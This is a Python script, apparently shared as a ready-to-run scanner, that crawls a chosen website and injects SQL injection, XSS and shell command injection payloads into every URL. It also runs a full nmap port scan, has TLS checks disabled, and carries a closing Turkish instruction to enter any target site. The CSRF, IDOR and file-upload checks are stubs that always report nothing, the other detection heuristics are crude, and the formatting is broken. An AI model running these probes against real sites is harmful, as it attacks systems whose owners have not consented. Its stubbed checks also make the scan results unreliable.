import requests
from bs4 import BeautifulSoup
from urllib.parse import urljoin
from requests.adapters import HTTPAdapter
from requests.packages.urllib3.util.retry import Retry
import warnings
import subprocess
SSL uyarılarını bastırmak için
warnings.filterwarnings("ignore", message="Unverified HTTPS request")
def get_all_links(url):
session = requests.Session()
retry = Retry(connect=3, backoff_factor=0.5)
adapter = HTTPAdapter(max_retries=retry)
session.mount('http://', adapter)
session.mount('https://', adapter)
try:
response = session.get(url, verify=False, timeout=10)
response.raise_for_status()
except requests.exceptions.RequestException:
return set()
soup = BeautifulSoup(response.text, 'html.parser')
links = set()
for link in soup.find_all('a', href=True):
full_url = urljoin(url, link['href'])
if full_url.startswith(url):
links.add(full_url)
return links
def check_sql_injection(url):
payloads = ["'", "' OR '1'='1", "' OR '1'='1' -- "]
for payload in payloads:
test_url = f"{url}{payload}"
try:
response = requests.get(test_url, verify=False, timeout=10)
response.raise_for_status()
if "error" in response.text.lower() or "syntax" in response.text.lower():
return True
except requests.exceptions.RequestException:
continue
return False
def check_xss(url):
payloads = ["<script>alert('XSS')</script>", "<img src=x onerror=alert('XSS')>"]
for payload in payloads:
test_url = f"{url}{payload}"
try:
response = requests.get(test_url, verify=False, timeout=10)
response.raise_for_status()
if payload in response.text:
return True
except requests.exceptions.RequestException:
continue
return False
def check_csrf(url):
return False
def check_idor(url):
return False
def check_command_injection(url):
payloads = ["; ls", "&& ls"]
for payload in payloads:
test_url = f"{url}{payload}"
try:
response = requests.get(test_url, verify=False, timeout=10)
response.raise_for_status()
if "bin" in response.text or "usr" in response.text:
return True
except requests.exceptions.RequestException:
continue
return False
def check_file_upload(url):
return False
def check_open_ports(url):
try:
result = subprocess.run(['nmap', '-p-', url], capture_output=True, text=True)
return result.stdout
except Exception as e:
return str(e)
base_url = ''
all_links = get_all_links(base_url)
for link in all_links:
if check_sql_injection(link):
print(f"{link} SQL Enjeksiyon Açığı Bulundu")
if check_xss(link):
print(f"{link} XSS Açığı Bulundu")
if check_csrf(link):
print(f"{link} CSRF Açığı Bulundu")
if check_idor(link):
print(f"{link} IDOR Açığı Bulundu")
if check_command_injection(link):
print(f"{link} Komut Enjeksiyonu Açığı Bulundu")
if check_file_upload(link):
print(f"{link} Dosya Yükleme Açığı Bulundu")
open_ports = check_open_ports(base_url)
print(f"Açık Portlar:\n{open_ports}")
Kullanımı kolay base url degişkeninii içerisine hedef site adresini girin sitenin alt başlıklarını da tarayacak sonra hangi açık varsa bakacak açık yoksa açık yok diyecek